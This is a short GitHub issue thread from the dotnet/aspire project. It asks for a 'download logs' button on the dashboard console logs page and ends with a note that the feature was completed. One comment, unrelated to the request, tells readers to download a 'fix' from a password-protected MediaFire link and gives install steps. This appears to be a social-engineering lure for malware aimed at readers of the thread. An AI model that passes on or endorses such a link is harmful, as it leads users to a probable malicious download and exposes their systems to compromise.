### ISSUE TITLE
Add download logs button to dashboard console logs page

### ISSUE THREAD

**Issue by JamesNK** [dotnet/aspire#5456]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Is your feature request related to a problem? Please describe the problem.

There are situations where you want to save logs after the dashboard has closed.

### Describe the solution you'd like

Add a button to download the current console's logs.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by adamint** [comment]
This was completed in #6300
